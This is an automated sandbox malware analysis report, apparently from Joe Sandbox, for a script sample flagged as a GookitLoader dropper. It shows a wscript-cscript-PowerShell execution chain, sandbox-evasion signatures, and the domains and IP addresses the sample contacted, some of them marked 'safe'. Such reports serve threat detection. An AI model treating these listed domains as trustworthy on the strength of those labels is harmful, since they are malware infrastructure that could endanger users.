Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500124 Sample: is it legal to kill a peaco... Startdate: 27/08/2024 Architecture: WINDOWS Score: 72 29 www.shamara.de 2->29 31 ipacrack.com 2->31 33 ellinikiaktoploia.net 2->33 41 Yara detected GookitLoader 2->41 43 Sigma detected: WScript or CScript Dropper 2->43 8 wscript.exe 1 1 2->8         started        11 wscript.exe 1 2->11         started        13 wscript.exe 2->13         started        signatures3 process4 signatures5 49 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->49 15 cscript.exe 1 1 8->15         started        51 Suspicious execution chain found 11->51 53 Potential evasive JS / VBS script found (domain check) 11->53 17 cscript.exe 1 13->17         started        process6 process7 19 powershell.exe 14 48 15->19         started        23 conhost.exe 15->23         started        25 powershell.exe 40 17->25         started        27 conhost.exe 17->27         started        dnsIp8 35 www.shamara.de 109.237.132.6, 443, 49713, 49715 CLOUDPITDE Germany 19->35 37 ipacrack.com 188.114.96.3, 443, 49716, 49718 CLOUDFLARENETUS European Union 19->37 45 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 19->45 47 Loading BitLocker PowerShell Module 19->47 39 ellinikiaktoploia.net 104.21.67.130, 443, 49717 CLOUDFLARENETUS United States 25->39 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.67.130
 ellinikiaktoploia.net United States
13335 CLOUDFLARENETUS false
109.237.132.6
 www.shamara.de Germany
45012 CLOUDPITDE false
188.114.96.3
 ipacrack.com European Union
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
ipacrack.com 188.114.96.3 true
ellinikiaktoploia.net 104.21.67.130 true
www.shamara.de 109.237.132.6 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.shamara.de/ false
  • Avira URL Cloud: safe
 unknown
https://ipacrack.com/ false
  • Avira URL Cloud: safe
 unknown
https://ellinikiaktoploia.net/ false
  • Avira URL Cloud: safe
 unknown